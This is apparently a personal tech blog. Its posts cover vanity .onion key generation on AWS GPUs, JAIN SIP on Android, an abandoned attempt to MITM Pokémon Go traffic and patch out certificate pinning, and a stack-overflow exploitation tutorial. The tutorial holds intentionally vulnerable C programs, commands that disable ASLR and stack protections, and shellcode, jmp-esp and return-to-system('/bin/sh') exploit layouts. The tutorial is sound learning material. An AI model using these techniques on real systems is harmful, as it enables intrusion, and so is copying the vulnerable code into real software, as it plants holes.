Generating vanity .onion domain names using Amazon AWS GPUs

Saturday, February 16th, 2019

First, here’s a good guide on using Scallion to generate .onion keys using a GPU. Start with that if you’ve got access to the actual hardware. If you own the hardware, presumably you have the proper drivers installed, so it should be pretty easy.

But if you want to just spend a few bucks and rent an AWS GPU temporarily, you will probably have some issues following those instructions to install the Nvidia OpenCL libraries on a standard AWS Debian or Ubuntu image. Maybe you landed here because you got one of these errors:

Package nvidia-opencl-icd is a virtual package provided by:
nvidia-opencl-icd-384 384.130-0ubuntu0.16.04.1
nvidia-opencl-icd-340 340.104-0ubuntu0.16.04.1
nvidia-opencl-icd-304 304.135-0ubuntu0.16.04.2
You should explicitly select one to install.
E: Unable to locate package nvidia-opencl-common
E: Package 'nvidia-opencl-icd' has no installation candidate

Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
nvidia-opencl-dev : Conflicts: opencl-dev
ocl-icd-opencl-dev : Conflicts: opencl-dev
Recommends: libpoclu-dev but it is not installable
E: Unable to correct problems, you have held broken packages.

ubuntu@...:~/scallion-v2.0$ mono scallion.exe -l
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v4.0.30319
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message) Unhandled Exception:
System.InvalidOperationException: ErrorCode:'-1'
at scallion.CLDeviceInfo.CheckError (Int32 err) <0x41448340 + 0x00093> in :0
at scallion.CLDeviceInfo.GetDeviceIds (IntPtr platformId, DeviceTypeFlags deviceType) <0x41449290 + 0x00055> in :0

Figuring out dependencies sucks. Dealing with Linux drivers sucks. So instead of that, you should use an OS image where someone has already done this for you! You would think that maybe AWS would suggest this to you when using a GPU instance, since you can’t very well use it without the GPU libraries, but here we are.

Just search for “GPU” when selecting your AMI and you will be much happier than if you tried to install this stuff yourself. Install the rest of the packages mentioned in that other post (namely: $ sudo apt-get install clinfo mono-complete mono-devel beignet beignet-dev libssl-dev) and hopefully you should be good to go.

One final note: you can download binary packages from Scallion’s GitHub rather than compiling it yourself. Given that it uses .NET for some reason, cutting out some of the Mono build stuff also saves you one step that could go wrong on Linux

$ mono scallion.exe -l
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v4.0.30319
Id:0 Name:Tesla M60
PreferredGroupSizeMultiple:32 ComputeUnits:16 ClockFrequency:1177
MaxConstantBufferSize:65536 MaxConstantArgs:9 MaxMemAllocSize:1997225984

$ mono scallion.exe -t4 -d 0 melon
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v4.0.30319
Cooking up some delicions scallions…
Using kernel optimized from file kernel.cl (Optimized4)
Using work group size 32
Compiling kernel… done.
Testing SHA1 hash…
CPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
GPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
Looks good!
...
LoopIteration:5 HashCount:83.89MH Speed:1398.1MH/s Runtime:00:00:00 Predicted:00LoopIteration:6 HashCount:100.66MH Speed:1398.1MH/s Runtime:00:00:00 Predicted:00:00:00 Found new key! Found 1 unique keys.

2019-02-16T08:01:41.734936Z
melonqgytws2cgwh.onion
-----BEGIN RSA PRIVATE KEY-----




Real-time text development notes 3

Friday, September 9th, 2016

I’ve been meaning to write down some general impressions from my first attempt at a SIP app on Android, specifically my RTTApp. This was my first time using JAIN SIP and Android, so it was a bit rough, but I eventually got it all working reasonably well. Surely any future attempt at using either of those will go better, and the things that bothered me might not so much later, but there really were quite a few things that made this harder than I expected.

JAIN SIP

First of all, this full-featured framework was way more full-featured than I expected. It’s fairly imposing. Since I don’t have a ton of software development experience, it might not have been such a great choice to dive into this one. I wanted to make a simple client, but this library can be used for all sorts of other SIP apps, like servers and proxies. If you don’t need that, and you really just want something one step up from the useless Android APIs, you might try looking around to see if anything else will meet your needs. JAIN SIP is not easy to use the first time.

My usual method of using some new library is to look at some example code, try making a few calls, and check the documentation when I need it. In this case, that does not work. You need to know how the whole things fits together before you get very far, and what things it does or doesn’t do for you. You need to know about its various layers. Read (really read) the lengthy documentation for SipStack, SipProvider, SipListener, and Dialog. And consider a book. There are plenty of short examples online showing how to send your first REGISTER message, but you really might want the conceptual overview and detail that an actual book could provide.

For example, while it handles some things like retransmissions (usually) under the hood for you, there are other cases where it hardly does anything for you at all. You won’t get very far if you don’t know anything about SIP. You can’t just say, “here’s a SIP address, please call it”. You need to construct all the messages yourself, and fill in most of the details, so you’d better know which headers are required on different types of requests. The Request and Response classes are basically dumb containers, and it’s up to you to know what to put in them. There’s very little hand holding in constructing these messages. You will be participating in SIP interactions and had better know what messages to expect in response, no way around it. This guy really loves SIP and wrote a number of posts that I found useful in understanding all sorts of SIP interactions.

When sending those messages, you need to be careful about how you handle client and server transactions created by the SIP stack. Sometimes you have to request a new transaction from it that you use immediately. Sometimes it seems to know what to do and has a transaction for you. Sometimes a RequestEvent has an existing transaction that you need to use to respond. But sometimes you need to hang on to a transaction you created yourself, and use that one specifically for a certain message. This all felt like a real mess to me, but maybe I just don’t understand SIP well enough. Then again, JAIN SIP’s notion of transactions is apparently not the same as in the actual SIP standard, or is that dialogs? To be honest I’m still no expert. This probably sounds stupid to more experienced JAIN SIP users, but that’s kind of my point; trying to use this framework for the first time makes you feel stupid, and then you start to ask if maybe the people who wrote it were the stupid ones, and I still don’t really know.

When you receive a message, it’s up to you to know the context for it. Is it a response to a request you sent? Is it for someone else entirely? Is it just some garbage that’s floating around the internet? The SIP stack takes very little responsibilty for correlating related messages and responses. My app doesn’t actually do enough of this, but I now know that you should probably keep some kind of data structure with the messages you’ve sent and received so you can relate future ones to them, and also have existing transactions and dialogs available if you need them. For all the complexity of the various layers of the SIP stack, it seems like it doesn’t keep track of that much for you. You have to keep track of some of its own state yourself, e.g. the state of transactions and dialogs, if you really want to be thorough and careful.

Issues with JAIN SIP on Android

One issue I had in trying to write a SIP app on Android was in the logging. When writing logic to handle incoming SIP messages, I wanted to see what messages were received, so I tried to write them to the log, but basically none of them were showing up. This turned out to be entirely Android’s problem, and had nothing to do with JAIN SIP, but it was caused by trying to log large SIP messages. SIP requests can be pretty long, compared to the stuff one normally writes in a log, and Android refuses to handle this. The Log class silently eats any messages it deems “too long” (seems to be around 100 chars?), and there is no way to know this has happened. Indeed, there is no way for a new developer to know this can happen, because it is not documented. However well-intentioned the functionality is, doing it silently and secretly is colossally stupid and rude, which is typical of Android, but more on that later.

Speaking of logs, JAIN SIP wants to use Log4j to handle its own logging, which I gather is common enough on desktop Java apps but unnecessary on Android. Since Log4j is not normally present, including the JAIN SIP jar will cause your Android build to fail right off the bat. You need to include the log4j.jar in your libs directory, even if you don’t plan on using it. Alternatively, I suppose you could modify JAIN SIP from source to exclude this and recompile it yourself, but that sounds a lot harder than simply including this other jar in what will probably be a multi-MB app anyway.

After managing to receive SIP messages, I encountered another Android hiccup when trying to send some. ClientTransaction.sendRequest(), for example, will fail with a NetworkOnMainThreadException. This is an effort to make the UI thread smoother by preventing people from trying to wait on TCP sessions, and the solution is to do network stuff in an AsyncTask subclass. This is not something you will see in any JAIN SIP example code, since they all assume that Java desktop apps can handle the network however they like.

Doing some network stuff in a background thread is probably a good idea, so I appreciate the strong suggestion on the part of Android, but in this case I’m not sure how much sense it makes. I did use a number of AsyncTasks for sending my various kinds of messages, but it really created a lot of hassle in JAIN SIP. AsyncTask is kind of a pain generally, since it has a really general API that has to work for any kind of data you are passing in and returning. When sending UDP messages, as one generally does in real-time apps, this may not be necessary. You can disable this strict thread policy, but if you do, you’ll need to be careful that your app isn’t doing any other TCP stuff on the main thread that you didn’t consider. Note that the StrictMode.ThreadPolicy documentation is wrong, and LAX is not the default.

Wrong docs, eh? That brings us to…

Other Android Gripes

Warning: this section is basically complaining.

The first thing to say about Android specifically is that it can’t do much in the way of real-time SIP stuff except for really basic audio calls. Hence, the need for JAIN SIP. It’s too bad, though. Android’s APIs make it straightforward to establish audio calls, so why not any other type of call? Did they really never think that phones would be used for something besides, you know, talking on the phone? If they are going to offer this interface at all, it would really be best if they would put some effort into beefing up this functionality to make a more approachable interface than JAIN SIP. I would understand if this were the first version of this API, but it’s been like this for over 5 years. I guess they’re too busy with ugly watches and ways to make you crash your car ::eyeroll::

But this also gets to a larger problem with Android. This simple API doesn’t do much, but the ones that do are complex. To be sure, that is a feature of APIs in general: the more you do, the more complex it is. But to me — and yes I’m still fairly new at this — Android just seems pretty bad. It’s a little hard for me to judge that, not having used a system this big before, so I tried to see if other people feel the same way. These people sure do, so I don’t feel quite so dumb now. It doesn’t help that the official tutorials I’ve been using are well out of date and in some cases not even correct at the time they were written (like, syntax errors, seriously). It’s changing so fast that there’s all this crap in there from “old” ways of doing things a couple years ago, and nothing is removed yet, and it’s hard to know if there is a good reason to use the “new” way or not. Sometimes the docs say some new way is preferred, but not why, or when. (And of course a lot of them are wrong or incomplete. I appreciate that writing and updating really good docs is hard, but you’d think one of the most successful software companies in the world could handle this)

They’re adding all this complexity, but not hiding some where they should. Take the SQLiteDatabase. The API here looks like it probably comes straight from the database. There’s a cursor you have to move once a query is returned. Why? Is that really necessary for most Android uses? Some database concepts don’t make sense when you’re dealing with a simple little thing most often used in simple little ways in simple little apps. Is it too much to ask to get an actual data structure back from a query, rather than mucking around with the cursor?

Another example: Cursor.getString() requires you to know the column number you queried, which you have to get from another method by looking up the column index for the column name. Why does this workflow even exist? What possible use could a smartphone developer ever have for the column number directly, when they could be querying by name? Saving this one line in the API could probably save millions of lines across all the apps in the world, and would take about 15 seconds to implement at Google. And, oh yeah, get this fuckery: the documentation says that some behavior is implementation-defined. Excuse me? Is there another implementation of Android that I’m not aware of? Maybe it’s dependent on the implementation of SQLite, but, um, I don’t recall personally selecting which implementation is used on every single Android device. Perhaps that was done by Google, who wrote this doc?

Why have they preserved this useless database interface, which many apps will need, but added their cut-down toy API on top of SIP, which is much more niche?

(Not really) Reverse Engineering Pokémon Go

Wednesday, August 17th, 2016

I have enjoyed playing Pokémon Go. So have tens of millions of other people, so many that the developer Niantic was completely unprepared to handle this level of interest at first. While they had their hands full, I thought it would be fun to try to reverse engineer their protocol and try to mess with the app. Practical applications of this include finding the exact location of nearby Pokémon, reporting security bugs, and of course cheating. It would definitely be fun to find any glaring security holes that were now suddenly affecting a huge number of people.

Eventually I gave up on this after Niantic caught up to the reverse engineers and made it more difficult to decrypt the traffic. This is probably a losing battle for Niantic, but it sufficiently discouraged casual tinkerers like me. The more dedicated ones are still working over at /r/PokemonGoDev. Since I spent some time on it, I figured I’d write up what I learned from the experience. Learn from failure, and all that.

Aside: don’t use Windows

This is neither here nor there, since people already have plenty of preferences about OSes, but it ended up getting in my way in this case. You certainly can do anything on Windows that you can on another other computer. But when you’re trying to do anything UNIXy, like talk to an Android device over adb, Windows isn’t going to help. I went so far as to even install a Windows version of bash to try to improve the shell experience on the work laptop from my summer job that I used for this project, but that didn’t really help. Maybe Microsoft’s own upcoming port of the core Linux utilities will be better, or maybe I’m just not good enough at computers to immediately get the hang of this version. Whatever.

Don’t touch any variant of Android on an x86 host

Initially I wanted to do all my experiments on a PC, since it’s easier to mess around on a “real” computer than on a physical Android device. Even with root, you have to jump through more hoops, and there are more tools available on a PC. I figured cleartext packet captures might be easier to come by if the source was a VM on my laptop. This is wrong, but never mind, here’s what I tried:

  1. Standard x86 build of Android installed by me in a Virtualbox VM
  2. Standard x86 build of Android in someone else’s pre-made VM
  3. Genymotion Android VM on a Windows host
  4. Bluestacks Android ARM emulator on a Windows host
  5. Bluestacks Android ARM emulator on a Windows guest VM

Only the last one of these allowed me to successfully run Pokémon Go and isolate the traffic from it, and then only briefly. This entire class of activity is too niche to be supported well. Just use a real device.

I would leave it there and move on, but in the interest of getting some kind of value from the time I wasted on these attempts, I’ll write down some of the problems I encountered.

x86-native Android in a VM

This would seem to be the most promising way to run Android on a PC, because it’s the fastest. Unfortunately basically no one actually uses Android on PC hardware for anything, so not a lot of people have an interest in making this work. There’s no worldwide network of Cyanogenmod devs who have the same needs as you with your exact device. There’s a project, and you can find people talking about it on xda-developers, but it’s not exactly mainstream.

The basic experience of running an x86 Android build in a VM is actually not bad — it supports the mouse and keyboard and all that no problem. But neither of the versions I tried actually worked when it came to the most important thing: installing Pokémon Go from the Google Play store. The Play app did not say that my device was not supported, which was nice, since indeed the newer builds (since 29.2) are supposed to support x86 devices like the Asus Zenfone. But installation failed, and checking the provided link in the error message was no help. That generic error page actually had a note added to it recently that specifically mentioned that the Play Store could not help with Pokémon Go problems. Ha.

Perhaps we can sideload the apk? I got a copy off my ARM device, which failed to run on the x86 VM. Checking the logcat, the app was looking for some ARM libraries that clearly would not work here. I tried a copy of the app from apkmirror (of course I wouldn’t do this on my real device), which said that it should now support x86, but the same problem appeared. Some people online suggest installing an ARM compatibility layer for your x86 Android device; no luck.

So, Android on x86 exists, but that’s about all I can say about it.

Commercial VMs/Emulators

The most promising prepackaged commercial solution seemed to be Genymotion, which is free for personal use and can automatically download appropriate ROMs for your preferred Android version. It is also an x86 VM, but this is not entirely obvious at first, because the virtual devices it creates make themselves out to be “phones”. To make a long story short, some of the same problems occurred here. In fact, it was worse, since the Play Store said off the bat that the device is not compatible with Pokémon Go. Since Genymotion is targeted at gamers, other people have tried sideloading it as well, and again people online suggested a Genymotion ARM Translator layer, which can be downloaded from some sketchy site. I’m not particularly attached to any of the data in this brand new VM, so I tried it, but again no luck.

I downloaded another commercial Android VM/emulator(?) AndyRoid, but 16 scanners on VT think this is malware. Hmm. It’s a downloader, clearly, so maybe a false alarm, but let’s go ahead and pass on that one.

Next up: an actual ARM emulator, Bluestacks. This one is also targeted at games, and Pokémon Go is even on their homepage, so this seemed promising. Indeed, it installs and launches OK. Progress!

Unfortunately, this simplified game platform thing has a few drawbacks. For one, being an emulator, it’s slow. Oh well. But more problematically, since it uses a highly modified custom ROM, some settings aren’t available in the normal place. Like, say, developer options, network settings, and the ability to even view your own IP address. There’s no file manager. The interface is clunky. I think I had to do something special to get adb working (I’ve tried to forget some of this). All around this is a pain.

The first unworkable problem to crop up with this emulator is that it is hard to isolate the traffic from it in Wireshark. It is a regular desktop app like any other, so it uses the same network interface as everything else. What would be better would be to have a virtual interface set up for it that we can isolate. So, I installed it in a Windows VM (on a Windows host, this is so silly). This nested virtualization started to get annoying, but worked.

With Bluestacks, you can access the full Play Store to get access to things like GPS spoofing apps, and an opaque rooting binary. Who knows what that thing does. But again, I didn’t have any real data exposed, so who cares (I took the calculated risk that this platform is obscure enough that these apps would not contain specific VM escape exploits for it, and it was within another VM anyway).

I followed a series of extremely sketchy instructions from Bluestacks themselves on how to spoof GPS in a way the app wouldn’t detect, and everything was just barely working. I left for the day, and when I came back the next…it didn’t work anymore. Honestly I don’t even remember what the exact problem was. Something had borked the entire Bluestacks environment. Screw this.

Use a real device

Seriously, just do this. You can’t capture the traffic in Wireshark as easily, but actually you don’t want to anyway. My initial Wireshark experiment with the layered VMs indicated that the interesting traffic appeared to be encrypted with TLS (as you would hope). To strip this off, you could try to recover the keys from the device’s memory, or something, but the best way is to MITM the connection with your own proxy.

You could try setting this up yourself with something like sslsniff, if you know what you’re doing when it comes to certificates and ARP spoofing and so forth (you know the difference between layer 2 and layer 3, right?). Moxie’s instructions are pretty good. An even friendlier option, and ultimately a more useful one, is mitmproxy, which is extremely easy to set up and is especially handy for parsing the intercepted HTTP traffic in real time. This tool automates the process of installing its own root cert on the device. Then you can watch the requests and responses flow by and have it parse the json/xml/protobuf for you. There’s a Python library to work with the packet capture format it uses. I had no problem getting decrypted traffic from Pokémon Go v29.2 when routing my device’s traffic through this proxy.

Now then, let’s talk about what’s in there. I expected it to be something reasonably straightforward like json, which mitmproxy and any number of other tools/libraries have no trouble parsing. Nope, it uses protocol buffers, a library to make compact binary protocols easier to use on the developer end. Decoding the structure of protobuf data is easy enough, but unfortunately if you didn’t write the protocol, you have no idea what any of it means. As my networking professor put it, binary protocols are more efficient, but text protocols are more useful for humans who have to program them. Protobuf makes binary easier for developers, but not really for reverse engineers who don’t have the protocol definition.

The smart people at /r/PokémonGoDev have made pretty good progress on reversing some of what’s in there and have some .proto files available to help third-party programmers parse it. They aren’t complete, though, and you’ll need some experience with protobuf to really get a handle on this. Rather than figuring the rest out yourself, here’s someone who has already made a lot of progress on this task. Looks handy! Even better, here is a whole MITM toolkit ready to go, apparently. OK sweet.

Cryptography!

Just as I found all of these tools, a wrinkle appeared. Version 31.0 of the app uses certificate pinning, and believe it or not, the certificate/keys generated by mitmproxy are not the ones the app expects. This is general good security practice, but in this case it was probably added specifically to stop the kind of thing we are doing. Niantic is not happy about all the mapping apps and bots that have sprung up.

This guide has a nice walkthrough of ways to patch the binary to remove the cert check. That’s a fun example of how to patch binaries in general to disable certain behaviors (like checking serial numbers…not that anyone should ever do such a thing). One issue that arises here is that Google login will no longer work, since the apk will not be signed properly, and you will have to use a Pokémon Trainer Club account.

I tried one of the suggested patch methods, but it did not immediately work, and I lost patience. Niantic wants to shut us out from reading and injecting traffic, and I don’t blame them! Part of my goal here was to figure out how hard such a thing would be. It’s clearly not impossible, but they are trying to make it harder. I don’t have the time to try to keep up in this escalating battle. When it comes to bots, honestly I hope Niantic wins this arms race. The bot writers don’t think they will. Whatever happens, those of us casually poking around will have our work cut out for us. After this many hurdles, I’m calling it quits and am going back to just enjoying playing the game like a normal person.

Smashing the stack, mainly for fun and no profit

Thursday, July 21st, 2016

The basics

Stack buffer overflows are one of the most common types of security vulnerability. Mudge and Elias Levy/Aleph One published papers 20 years ago about how to exploit them and gain code execution (i.e. redirect program flow to your own code). This is now harder, but the basic problem of lack of memory safety in C and its descendants is still with us. I’ve been learning the basics of writing stack buffer overflow exploits and how to get around some of the modern defenses against them. This is a distillation of my notes to myself, which breaks no new ground, but may as well be on the internet in case it helps someone else.

My writeup here assumes basic familiary with C, x86 assembly, and gdb. Unfortunately, you’ll definitely need the first two if you want to get started with this kind of exploitation in general. This was all done on Ubuntu 12.04 32-bit with gcc 4.6.3, though it should all be pretty similar on another 32-bit Ubuntu install.

A good place to start for an even simpler demo than Mudge’s paper is this Computerphile video. That will show you the basics of how to use gdb to find what you need to exploit this simple program:

#define BUFSIZE 500
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    strcpy(buf, argv[1]);
    return 0;
}

The basic principle is that we are going to overwrite the saved %eip on the stack, so when main() returns, it jumps to the address we want, which will contain the code we want to execute. In this basic formulation, we will write both our shellcode and the address to execute all in one step. We will exploit this program by feeding all this data in as the argument, which strcpy helpfully writes to the stack for us.

In order for this simple technique to work, we need to disable three protections against stack buffer overflows: ASLR, the stack canary, and the non-executable stack. More details follow later, but the main things to do are this:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ gcc buf_overflow.c -o buf_overflow.out -g -z execstack -fno-stack-protector

The first command tells the kernel to disable ASLR when loading programs. When building with gcc, the -z flag tells the linker to mark the stack pages as executable, which they normally aren’t, and -fno-stack-protector omits the canary checking code.

As an aside, you will probably want to enable core dumps so you can examine the state of the process when it crashes if your exploit is not quite right:

$ ulimit -C unlimited

Here’s main()’s stack frame:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000

Our exploit will be written in to buf, starting at the low address and going up from there. We need to precisely position all our malicious bytes so that the return address exactly lines up with the saved %eip, and that address points to the part of the stack where our shellcode is. The exact location of &buf may not quite be %esp or %ebp – 500; the compiler is free to put other local variables on the stack and arrange things however it likes, and it has to align some variables to 4-byte word boundaries. This is why you have to play around in gdb to examine the stack and find the exact addresses you need.

A basic exploit technique that slightly loosens the requirements for preceise addresses is the nop sled. Putting a huge chunk of nop instructions (technically “xchg eax, eax”, opcode 0x90) in front of the shellcode means you can jump anywhere in that region and execution will proceed to the beginning of the actual code. Our exploit will look roughly like this:

--------------------------------------------------------------
| 0x90 x ~475 | ~25b shellcode | new %ebp ptr | new %eip ptr |
--------------------------------------------------------------

Replacing the saved %ebp with a real value may not be necessary, depending on the shellcode you are using. If you are really hardcore, you can write some yourself, but you probably won’t be l337 enough to run execve(“/bin/sh”) in 23 bytes, so you might want to use this one. In this case, you don’t need to set %ebp, but you may need to set %esp, since the shellcode uses that register, and returning from main() may set it to a place you don’t want. Perhaps you can find some other shellcode that doesn’t have this problem, or you can add an instruction to set %esp somewhere safe. In gdb, I found that 0xBFFFF310 was a good spot, since that’s where %esp was set for main().

mov 0xBFFFF310, %esp

This assembles to 0xBC 0x10 0xF3 0xFF 0xBF (remember, x86 is little endian, so don’t get your hex bytes backwards within a word). Again, if you can write assembly, maybe you can do this without hardcoding the address. We do have to hardcode the return address, though. Since we have the %esp address from main() here, we should be able to jump into the middle of the nop sled above there, let’s say 0xBFFFF410. So here is the exploit:

--------------------------------------------------------------------------
| 0x90 x 480 | 0xBF 0xBFFFF310 | 23b shellcode | 0x90909090 | 0xBFFFF410 |
--------------------------------------------------------------------------

You can generate that input with Python, as in the Computerphile video, or write it out in a hex editor. Running it should open a new shell, rather than returning you to the one you came from.


A more realistic example

We can use almost the same exploit for a slightly more complicated program:

#define BUFSIZE 500
void read_file(int fd, char *buf, size_t bufsize) {
    size_t r;
    do {
        r = read(fd, buf, bufsize); // bad: must decrement bufsize
        buf += r;
    } while (r > 0);
}
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    int fd;
    if (argc != 2) {
        printf("Usage: buf_overflow_file filename");
        exit(1);
    }
    fd = open(argv[1], O_RDONLY);
    read_file(fd, buf, BUFSIZE);
    printf("The file says: \n\n%s\n", buf);
    return 0;
}

This program takes a filename argument, reads the file into a buffer, and prints it. But it does the buffer length check incorrectly in read_file(), so we can overflow the buffer in main()’s stack frame, even though the read occurs in a different function. Nothing is substantially different in this version of the exploit, except slightly different addresses and stack placement, since there is an extra stack variable in main()’s frame.

--------------------------------------------------------------------------
| 0x90 x 484 | 0xBF 0xBFFFF110 | 23b shellcode | 0x90909090 | 0xBFFFF200 |
--------------------------------------------------------------------------

Basic defense: ASLR

These simplified techniques don’t actually work on a modern Linux system. Any combination of ASLR, a non-executable stack, and a stack canary would defeat the simple version. In isolation, though, we can still get around some of those protections. First, we re-enable ASLR.

$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

If the location of the stack is randomized on each execution, hardcoded stack addresses won’t be any good. Instead, we need to write our shellcode in a place we can get to reliably every time, and somehow transfer execution there. A good place is %esp, since its location is easy to predict. At the time the exploit is written to the stack, %esp points below the write location, but when the vulnerable function returns, %esp will point above that stack frame. Directly above, in fact, immediately next to the return address. So we can rearrange the exploit like this:

-----------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | exploit %eip | 23b shellcode |
-----------------------------------------------------------

Now we know that %esp will point at the shellcode when main() returns, but we need to transfer execution to %esp. So we need to execute:

jmp %esp

The opcode for this is 0xE4FF. Since we control the compilation of this vulnerable program, we could add a new function:

void jmp_esp() {
    __asm__("jmp %esp");
}

But that’s not very realistic. This is not an instruction that is likely to occur in a real program. But we don’t actually need "jmp %esp", all we really need is 0xE4FF. This 2-byte value is much more likely to occur in a large executable somewhere, not even necessarily in the .text section. The processor doesn’t care whether 0xE4FF is supposed to mean “jmp %esp” or the decimal number 58623 or any other interpretation of bits — as long as %eip points to some location storing 0xE4FF, the processor will jump to %esp.

So let’s just add this simpler bit of code to our executable:

int jmp_esp = 0xE4FF;

Now that we know this 2-byte sequence will occur in the binary, we can return to its static location and transfer execution to our shellcode. Find the location in the binary:

$ objdump -D buf_overflow_aslr.out | grep 'ff e4'
    8048467: ff e4 jmp *%esp

As far as the disassembler is concerned, that code must be an instruction, which is what we’re going for, even though the value is in the .data section.

So here’s the new exploit file to bypass ASLR:

---------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048467 | 23b shellcode |
---------------------------------------------------------

Don’t forget, the little endian CPU needs to read your 0x8048467 address as 0x67 0x84 0x04 0x08. And as always, you’ll need to tune the size of the (unused) nop sled to properly position the return address and shellcode, depending on exactly how the compiler sets up the stack frame.


Another defense: non-executable stack

This ASLR bypass relies on the stack pages being marked executable by the linker instruction “-z execstack”. If the executable has been built without that flag, as it should be, you will get a segfault when trying to execute instructions at stack addresses. We can also get around this problem on its own, by executing existing code somewhere else. Functions in the C standard library (libc) are a popular choice, especially if the system() function has been linked in to the binary. system() runs its argument in a shell, which lets you run basically anything you want.

We have to make sure the linker includes a reference to this function in our executable:

void never_called() {
    system(null);
}

In this example, we do not have ASLR enabled. So, the address of the system() function will be very easy to find.

$ objdump -D buf_overflow_exec.out | grep 'system'
    08048390 <system@plt>:
    80484a8: e8 e3 fe ff ff call 8048390 <system@plt>

We need to return to 0x08048390 to call system(), which is easy enough, but we also need to set things up in the way it expects. Under normal circumstances, when a function is called, %esp points to the saved %eip value on the stack, which the caller put there, as well as the arguments to the function. system() takes one argument, a path to the executable to call. In our case, we want that to be another shell, i.e. “/bin/sh”. If you are writing this string out in a hex editor, you do not need to do anything differently for it to be written in little endian order; its natural representation is little endian, i.e. “ABCD” = 0x41 0x42 0x43 0x44.

We control the stack, so we can write this string there, and then we need to give a pointer to that location to system(). Our exploit will look something like this:

---------------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | ptr to next byte | "/bin/sh\0" |
---------------------------------------------------------------------------------------
                                          ^ "%eip"     ^ system() arg     ^ pointee

When system() returns, the program will segfault, unless the page containing 0xAAAAAAAA just happens to be executable, in addition to actually existing. To avoid that, you can put a real address there, but it might still crash since the stack won’t be set up properly.

To find the pointer we need to pass to system(), run the exploit in gdb and see where “/bin/sh” ends up. You can set a breakpoint in main() and examine the stack. Or, you can find %ebp within main() and try to use an address relative to that. Something like:

$ gdb buf_overflow.out
break main
run some-file
p $ebp

If the exploit is structured correctly, the string will be at %ebp + 16 (i.e. %ebp + 0x10). For example, if %ebp within main() is 0xBFFFF318, set the pointer to 0xBFFFF328.

---------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | 0xBFFFF328 | "/bin/sh\0" |
---------------------------------------------------------------------------------

Now you will return to system() and it will call /bin/sh for you.


More than the sum of their parts

Unfortunately, the last two exploit techniques can’t easily be combined. My non-executable stack bypass relies on knowing the exact location of some text on the stack, so we can write a static pointer to it. The ASLR bypass relies on writing some code to the stack, which we execute. The linking table is not usually randomized in Linux, so we can still call system() when ASLR is on, but it’s tough to give it the right argument. Perhaps if an executable happened to contain the string “/bin/sh” in a static location, we could pass that location to system() when ASLR is enabled; this seems pretty unlikely.

Therefore, these two defenses are reasonably effective in combination against this simple kind of attack. There are other attacks against ASLR, though, and more sophisticated return-oriented-programming (ROP) can still get around the non-executable stack. These bypass techniques are further than I’ve gone so far, but apparently they are pretty useful.

I have not yet gotten in to heap buffer overflows, but there’s another class of bug that is apparently popular to exploit now. Regarding ROP and ASLR, I recently met David Williams-King, who is working on a new type of ASLR that uses a table of pointers that is constantly moved around, every few milliseconds, rather than simply randomizing the entire address space once. Perhaps this academic research will eventually find its way into the wild and make ROP even harder.


A bigger show stopper: the stack canary

An especially effective defense that I have so far avoided is the stack canary, stack cookie, or as gcc calls it, the stack-smashing protector (SSP). The canary is a random value written on the stack between any buffers and the saved pointers. When the function returns, it checks the canary location against the known value, and if it doesn’t match, this suggests that the return address has been smashed, so it quits. With the canary enabled, our stack frame would look like this:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| 4 random bytes       | <-- canary
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000

The canary-handling code is generated by the compiler, if you use the flag -fstack-protector, which is the default. If you disassemble main(), you’ll see the code that writes and then checks the canary:

0x080484fb <+0>: push %ebp
0x080484fc <+1>: mov %esp,%ebp
0x080484fe <+3>: and $0xfffffff0,%esp
0x08048501 <+6>: sub $0x220,%esp
0x08048507 <+12>: mov 0xc(%ebp),%eax
0x0804850a <+15>: mov %eax,0x1c(%esp)
0x0804850e <+19>: mov %gs:0x14,%eax
0x08048514 <+25>: mov %eax,0x21c(%esp)
0x0804851b <+32>: xor %eax,%eax
0x0804851d <+34>: cmpl $0x2,0x8(%ebp)
0x08048521 <+38>: je 0x804853c <main+65>
0x08048523 <+40>: mov $0x8048684,%eax
0x08048528 <+45>: mov %eax,(%esp)
0x0804852b <+48>: call 0x80483b0 <printf@plt> 0x08048530 <+53>: movl $0x1,(%esp)
0x08048537 <+60>: call 0x80483e0 <exit@plt>
0x0804853c <+65>: mov 0x1c(%esp),%eax
0x08048540 <+69>: add $0x4,%eax
0x08048543 <+72>: mov (%eax),%eax
0x08048545 <+74>: movl $0x0,0x4(%esp)
0x0804854d <+82>: mov %eax,(%esp)
0x08048550 <+85>: call 0x80483f0 <open@plt>
0x08048555 <+90>: mov %eax,0x24(%esp)
0x08048559 <+94>: movl $0x1f4,0x8(%esp)
0x08048561 <+102>: lea 0x28(%esp),%eax
0x08048565 <+106>: mov %eax,0x4(%esp)
0x08048569 <+110>: mov 0x24(%esp),%eax
0x0804856d <+114>: mov %eax,(%esp)
0x08048570 <+117>: call 0x80484cb
0x08048575 <+122>: mov $0x80486a6,%eax
0x0804857a <+127>: lea 0x28(%esp),%edx
0x0804857e <+131>: mov %edx,0x4(%esp)
0x08048582 <+135>: mov %eax,(%esp)
0x08048585 <+138>: call 0x80483b0 <printf@plt> 0x0804858a <+143>: mov $0x0,%eax
